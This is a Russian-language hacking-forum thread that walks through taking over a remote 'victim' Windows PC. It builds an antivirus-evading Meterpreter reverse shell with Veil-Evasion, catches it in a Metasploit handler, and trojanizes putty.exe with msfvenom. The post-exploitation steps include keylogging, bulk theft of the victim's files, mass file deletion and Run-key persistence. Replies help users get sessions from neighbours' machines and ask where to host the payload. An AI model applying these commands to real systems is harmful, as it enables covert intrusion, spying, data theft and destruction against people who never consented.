Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Veil.. есть комбайн (есть ли какой нибудь мануал, как пользоваться комбайном в veil-evasion ) ? Протекторы (сколько много открытий для себя ) ?

Именно в начале топа и есть описание по работе с Veil, Vander отлично сделал обзор по данному инструменту. Если этого мало, то можно посмотреть самостоятельно, какие есть модули в данном софте. К примеру команда help. А технологию Vander описал по шагам, меня модуль, смысл останется тем же
Протекторы, крипторы, пакеры - задача одна - скрыть вредоносной файл (код) от антивируса.
Могу посоветовать ознакомиться с Backdoor Factory ---> для раширения кругозора и общего понимания.
 
Последнее редактирование модератором:
  • Нравится
Реакции: Mixa и thunder

thunder

Green Team
08.12.2016
219
26
BIT
0
ghostphisher,Kot-gor: Подскажите в чем проблема..Делал по приведенному видео "Auto Exploit Windows Using Powersherll" при вводе команды "reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v 9999 -d c:\\Users\\hack\\Desktop\\backdoor.bat" появляется ошибка ..stdapi_registry_open_key: Operation failed:Access is denied .. Нужно получить права администратора ?
 
Последнее редактирование модератором:

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Operation failed:Access is denied .. Нужно получить права администратора ?

Access is denied - доступ запрещен. Значит нет на это привилегий, можно рассмотреть иные варианты: либо миграция на сервис имеющий эти привилегии либо админские.
 
  • Нравится
Реакции: Mixa и thunder

Сергей Попов

Кодебай
30.12.2015
4 723
6 709
BIT
390
ghostphisher,Kot-gor: Подскажите в чем проблема..Делал по приведенному видео "Auto Exploit Windows Using Powersherll" при вводе команды "reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v 9999 -d c:\\Users\\hack\\Desktop\\backdoor.bat" появляется ошибка ..stdapi_registry_open_key: Operation failed:Access is denied .. Нужно получить права администратора ?

code524654646664fb.png


4.5. Запрещается публикация сообщений, содержащих:
***
4.5.8.
Программный код, не оформленный соответствующими BB-кодами.
 
H

heyyy

Вообще скрины и то что пишет автор не сходится, на скрине локальный ip а не публичный, порт тоже 8443 и выходной файл питоновский, а не exe
p.s. все сори затупил, нашел exe файл
 
F

for(i=0;i<225;i++);

Подскажите как конкретно эта команда работает????reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v 9999 -d c:\\Users\\hack\\Desktop\\backdoor.bat"
когда жертва запустит свой комп, он автоматически запутит сесию??? а подскажите а есле на растоянии как оно работает????или как быть если я создал файл под одним ip а потом хакнул саседа и подключился как быть что бы тот созданый файлик понел меня с другого ip????
[doublepost=1483569541,1483568804][/doublepost]Ребят прошу ВАС ответьте на все мои глупые вопросы!!!КАКой самы лучший способ проникновения на другой комп на растоянии???И подскажите как быть.!!!мня хакнули страницу вк, У меня есть только ip хакера как понять он динамичный или нет???и как можно этому хакеру заложить Зверинец зная только его ip???
 

Сергей Попов

Кодебай
30.12.2015
4 723
6 709
BIT
390
Подскажите как конкретно эта команда работает????reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v 9999 -d c:\\Users\\hack\\Desktop\\backdoor.bat"
Двумя сообщениями выше было замечание. Применено ограничение аккаунта на публикацию сообщений в течение 24 часов.
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
!КАКой самы лучший способ проникновения на другой комп на растоянии???И подскажите как быть.!!!мня хакнули страницу вк, У меня есть только ip хакера как понять он динамичный или нет???и как можно этому хакеру заложить Зверинец зная только его ip???

1) Комп на растоянии зная ip - все стандартно. Сканирование системы на предмет открытых портов, поиск эксплоитов под запущенные сервисы. Мы говорим про обычную систему (Win Mac *nix ) на которой работает человек, следовательно никаких широких возвожностей не будет (не думаю что все подряд запускают веб сервер, фтп, ssh, почту), а так же человек может сидеть за роутером, который в случае грамотной настройке так же становится не уязвим к темам из паблика. Уязвимости, которые принято называть 0-дей найти можно на рынке и стоимость будет очень высока.

2) IP может оказаться вообще прокси ( одним из цепочки ТОР), что бы узнать принадлежность - севрис whois, введя ip адрес будет отображена его принадлежность.

3) Заложить зная ip никак, подумаем логично - можно ли доставить посылку человеку, зная только в каком городе он живет не имея расширенных возможностей? А узнать, если вдруг IP и был не скрыт, какому абоненту он пренадлежал при работе с сетью - увы, возможности нет.
 
  • Нравится
Реакции: Mixa

e.exploit

Green Team
11.09.2016
21
9
BIT
24
Тема эта называется "Взлом удаленного ПК ..."
Всем, кто не имеет ещё обстоятельной практики взлома, кто только знакомится с предметом, начинающим... - я бы советовал прежде взлома заглянуть в тему здесь рядом пЫАнЭрам о хакинге.
Чтобы не порождать неоправданных надежд и иллюзий, и, как следствие, досадных разочарований ... "о бесцельно растраченном времени".
Потому что, для начала, ... скажем так: взломать надлежащим образом аккуратно (не что-то сверх супер-пупер!) защищённый компьютер (удалённо) под управлением операционной системы UNIX/Linux - практически невозможно.
В этой теме речь идет о взломе удаленной машины WINDOWS(ты же супер-профессионал, поэтому не мог это не заметить), а Linux используется как средство.
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Подскажите как конкретно эта команда работает????reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v 9999 -d c:\\Users\\hack\\Desktop\\backdoor.bat"
когда жертва запустит свой комп, он автоматически запутит сесию??? а подскажите а есле на растоянии как оно работает????или как быть если я создал файл под одним ip а потом хакнул саседа и подключился как быть что бы тот созданый файлик понел меня с другого ip????
[doublepost=1483569541,1483568804][/doublepost]Ребят прошу ВАС ответьте на все мои глупые вопросы!!!КАКой самы лучший способ проникновения на другой комп на растоянии???И подскажите как быть.!!!мня хакнули страницу вк, У меня есть только ip хакера как понять он динамичный или нет???и как можно этому хакеру заложить Зверинец зная только его ip???
При проведении пентеста на удаленную машину, нет понятия лучшего или худшего способа..Есть последовательность действий: в начале всегда идет сбор информации ,на основании полученной информации вы уже принимаете решения об использовании той или иной уязвимости, это так же может быть соц инженерия...В любом случае начинайте с азов,учите мат часть..со временем придет понимания команд, определенных техник ,итд...
 
D

DDoS-Protection

Помогите!!я создал фаил bat. и поместил к Другу саседу (тот же провайдер и у него свой роутер)он запускает файлик bat но у меня через стену сессия не открывается, на своих машинах работает в локальной сети.В чем может быть проблема???
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Помогите!!я создал фаил bat. и поместил к Другу саседу (тот же провайдер и у него свой роутер)он запускает файлик bat но у меня через стену сессия не открывается, на своих машинах работает в локальной сети.В чем может быть проблема???

Порты должны быть проброшены через роутеры
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
как понять проброшены???можно описания моих действий???

Ваш файл настроен на работу с портом ( к примеру ) 4444

Ваша система ждет связь на 4444 порту -----[Ваш роутер - на нем должен быть сделан броброс порта 4444 смотрит в локалку и в инет] ----- [роутер соседа на нем должен быть сделан броброс порта 4444 смотрит в локалку и в инет]

пример для TP-Link - проброс порта 1731
tp8.jpg
 
Последнее редактирование:
  • Нравится
Реакции: Mixa
M

Marvel666

Форумчане, подскажите пожалуйста ресурсы(сайты), куда можно закинуть .exe файлы, чтобы их можно было сразу скачать по ссылке напрямую, без переходов на эти сайты, вводов капчи, и прочего. Поднимать локальный сервер не подходит.
 
F

for(i=0;i<225;i++);

Ваш файл настроен на работу с портом ( к примеру ) 4444

Ваша система ждет связь на 4444 порту -----[Ваш роутер - на нем должен быть сделан броброс порта 4444 смотрит в локалку и в инет] ----- [роутер соседа на нем должен быть сделан броброс порта 4444 смотрит в локалку и в инет]

пример для TP-Link - проброс порта 1731
tp8.jpg

Вот я понять не могу!!!получается я должен сказать своей жертве чтобы он(она) вошла в роутер и настроил роутер???и продолжая говорю: я хачу вас взломать??? как вы думайте жертва согласиться мне помочь себя взломать???? тогда ищё один к вам вопрос есть ли другой эксплоит для того чтобы жертва запустил вирус и сессия открылась на любом растоянии без дополнительных настроек роутера???
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
как вы думайте жертва согласиться мне помочь себя взломать?

1) В частности, может прокатить и так, без вмешательство в настройки на стороне тестируемого. Делаем проброс на свей железке и ждем, так как при запуске файла на тестируемой системе код должен сам начать стучаться в Ваш порт (который откроете на роутере)

2) Если система и железо настроено хорошо у тестируемого, то никто не выпустит из системы утилиту, коорая очень хочет соедениться на каком то порту с удаленной системой

Сейчас, с другом, Вы можете поступить следующим образом: Вы пробросите у себя порты, настроите верно файл (куда впишите Ваш инетовский адрес и порт, на котором будете ждать коннект), Ваш друг выключит АВ и фаэрволы и запустит, при этом не забыв, если на железе тоже стоит защита, отключить ее.

ПС Вариант с пробросом на 2-х системах мною было предложено для того, что бы вы могли полноценно начать тестировать и понимать принцип работы. По поводу жертв и взломов - тут немного другой ресурс, как взломать жертву и т.д. это на другой адрес.
 
Последнее редактирование:
F

for(i=0;i<225;i++);

1) В частности, может прокатить и так, без вмешательство в настройки на стороне тестируемого. Делаем проброс на свей железке и ждем, так как при запуске файла на тестируемой системе код должен сам начать стучаться в Ваш порт (который откроете на роутере)

2) Если система и железо настроено хорошо у тестируемого, то никто не выпустит из системы утилиту, коорая очень хочет соедениться на каком то порту с удаленной системой

Сейчас, с другом, Вы можете поступить следующим образом: Вы пробросите у себя порты, настроите верно файл (куда впишите Ваш инетовский адрес и порт, на котором будете ждать коннект), Ваш друг выключит АВ и фаэрволы и запустит, при этом не забыв, если на железе тоже стоит защита, отключить ее.

ПС Вариант с пробросом на 2-х системах мною было предложено для того, что бы вы могли полноценно начать тестировать и понимать принцип работы. По поводу жертв и взломов - тут немного другой ресурс, как взломать жертву и т.д. это на другой адрес.

А если убрать роутер у саседа, сработает??? и если Будет жертва на другом провайдере???
[doublepost=1483816220,1483816182][/doublepost]
1) В частности, может прокатить и так, без вмешательство в настройки на стороне тестируемого. Делаем проброс на свей железке и ждем, так как при запуске файла на тестируемой системе код должен сам начать стучаться в Ваш порт (который откроете на роутере)

2) Если система и железо настроено хорошо у тестируемого, то никто не выпустит из системы утилиту, коорая очень хочет соедениться на каком то порту с удаленной системой

Сейчас, с другом, Вы можете поступить следующим образом: Вы пробросите у себя порты, настроите верно файл (куда впишите Ваш инетовский адрес и порт, на котором будете ждать коннект), Ваш друг выключит АВ и фаэрволы и запустит, при этом не забыв, если на железе тоже стоит защита, отключить ее.

ПС Вариант с пробросом на 2-х системах мною было предложено для того, что бы вы могли полноценно начать тестировать и понимать принцип работы. По поводу жертв и взломов - тут немного другой ресурс, как взломать жертву и т.д. это на другой адрес.

А если убрать роутер у саседа, сработает??? и если Будет жертва на другом провайдере???
или если открыть порт в armitage у себя, этого мало всеравно ???нужно лезть в свой роутер??7ответьте на все вопросы...
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!